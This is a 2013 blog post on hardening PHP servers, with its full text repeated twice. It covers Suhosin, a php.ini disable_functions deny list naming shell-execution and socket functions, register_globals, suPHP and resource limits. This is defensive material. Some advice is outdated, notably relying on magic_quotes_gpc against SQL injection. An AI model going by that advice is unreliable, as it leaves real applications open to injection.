Friday, May 17, 2013

PHP Security .

PHP is the most popular scripting language for apache and mysql. You will need to disable system level functions in the php configuration file.

Suhosin

Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers on the one hand against a number of well known problems in PHP applications and on the other hand against potential unknown vulnerabilities within these applications or the PHP core itself.

You can enable suhosin using /script/easyapache

1. Login as root and fire the following cmds
2. Run: /script/easyapache
3. search for option Suhosin
4. Save and build it.
5. php -m : To verify it.

Disable Dangerous PHP Functions

PHP has a lot of potential to mess up your server and hack user accounts and even get root. I’ve seen many times where users use an insecure PHP script as an entry point to a server to start unleashing dangerous commands and taking control.

Steps:

1. Search the php.ini file for: using command:
php -i | grep php.ini

2. Vi /usr/local/lib/php.ini

disable_functions =Look for the lines and make sure you have the lines as below..
disable_functions = dl, shell_exec, system, passthru, popen, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid

Turn off Register Globals

Register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn’t require variable initialization means writing insecure code is that much easier.

register_globals = Off

magic_quotes_gpc = On

It is best to keep magic_quotes to on as otherwise you forms using POST may be used for SQL injection attacks.
Run PHP through PHPsuexec/suphp Preventing Nobody Access

The biggest problem with PHP is that on cPanel servers is that PHP will run as nobody. When someone sets a script to 777 access that means the nobody user has write access to that file. So if someone on the same shared server wrote a script to search the system for 777 files they could inject anything they wanted, compromising the unsuspecting users account.

PHPsuexec makes PHP run as the user so 777 permissions are not allowed. There are a few downfalls to PHPsuexec but I think it’s required on a shared environment for the security of everyone. Safe_mode doesn’t prevent you from compromising other users files. This is where PHPsuexec comes in, it stops the user from being able to read another users files. It also makes it easier for you, the administrator, to track PHP mail function spamming and lots of other issues caused by PHP scripts because now you can easily track it ot the users account responsible.

The following settings are all useful ways of adjusting the resources your PHP scripts can consume:

; Maximum execution time of each script, in seconds
max_execution_time = 30

; Maximum amount of time each script may spend parsing request data
max_input_time = 60

; Maximum amount of memory a script may consume (8MB)
memory_limit = 8M

; Maximum size of POST data that PHP will accept.
post_max_size = 8M

; Whether to allow HTTP file uploads.
file_uploads = Off

; Maximum allowed size for uploaded files.
upload_max_filesize = 2M

Avoid Opening Remote Files

One of the useful abilities of PHP is the ability to open files remotely without any complex processing.

Many simple scripts use this ability, for example a comic viewer might open up images from a remote server just using the fopen function – which is ordinarily used to open files.

It is an ability has often been abused in insecure scripts though.

If you have a script which tries to open a file and the filename is controllable by a remote user two things can happen:
Any file on the local system which the web server can read can be viewed by the remote attacker.
Arbitrary commands can be executed upon your server if the user can cause a remote PHP file to be opened.

Hardening PHP for Security

PHP is the most popular scripting language for apache and mysql. You will need to disable system level functions in the php configuration file.

Suhosin

Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers on the one hand against a number of well known problems in PHP applications and on the other hand against potential unknown vulnerabilities within these applications or the PHP core itself.

You can enable suhosin using /script/easyapache

1. Login as root and fire the following cmds
2. Run: /script/easyapache
3. search for option Suhosin
4. Save and build it.
5. php -m : To verify it.

Disable Dangerous PHP Functions

PHP has a lot of potential to mess up your server and hack user accounts and even get root. I’ve seen many times where users use an insecure PHP script as an entry point to a server to start unleashing dangerous commands and taking control.

Steps:

1. Search the php.ini file for: using command:
php -i | grep php.ini

2. Vi /usr/local/lib/php.ini

disable_functions =Look for the lines and make sure you have the lines as below..
disable_functions = dl, shell_exec, system, passthru, popen, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid

Turn off Register Globals

Register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn’t require variable initialization means writing insecure code is that much easier.

register_globals = Off

magic_quotes_gpc = On

It is best to keep magic_quotes to on as otherwise you forms using POST may be used for SQL injection attacks.
Run PHP through PHPsuexec/suphp Preventing Nobody Access

The biggest problem with PHP is that on cPanel servers is that PHP will run as nobody. When someone sets a script to 777 access that means the nobody user has write access to that file. So if someone on the same shared server wrote a script to search the system for 777 files they could inject anything they wanted, compromising the unsuspecting users account.

PHPsuexec makes PHP run as the user so 777 permissions are not allowed. There are a few downfalls to PHPsuexec but I think it’s required on a shared environment for the security of everyone. Safe_mode doesn’t prevent you from compromising other users files. This is where PHPsuexec comes in, it stops the user from being able to read another users files. It also makes it easier for you, the administrator, to track PHP mail function spamming and lots of other issues caused by PHP scripts because now you can easily track it ot the users account responsible.

The following settings are all useful ways of adjusting the resources your PHP scripts can consume:

; Maximum execution time of each script, in seconds
max_execution_time = 30

; Maximum amount of time each script may spend parsing request data
max_input_time = 60

; Maximum amount of memory a script may consume (8MB)
memory_limit = 8M

; Maximum size of POST data that PHP will accept.
post_max_size = 8M

; Whether to allow HTTP file uploads.
file_uploads = Off

; Maximum allowed size for uploaded files.
upload_max_filesize = 2M

Avoid Opening Remote Files

One of the useful abilities of PHP is the ability to open files remotely without any complex processing.

Many simple scripts use this ability, for example a comic viewer might open up images from a remote server just using the fopen function – which is ordinarily used to open files.

It is an ability has often been abused in insecure scripts though.

If you have a script which tries to open a file and the filename is controllable by a remote user two things can happen:
Any file on the local system which the web server can read can be viewed by the remote attacker.
Arbitrary commands can be executed upon your server if the user can cause a remote PHP file to be opened.

No comments:

Post a Comment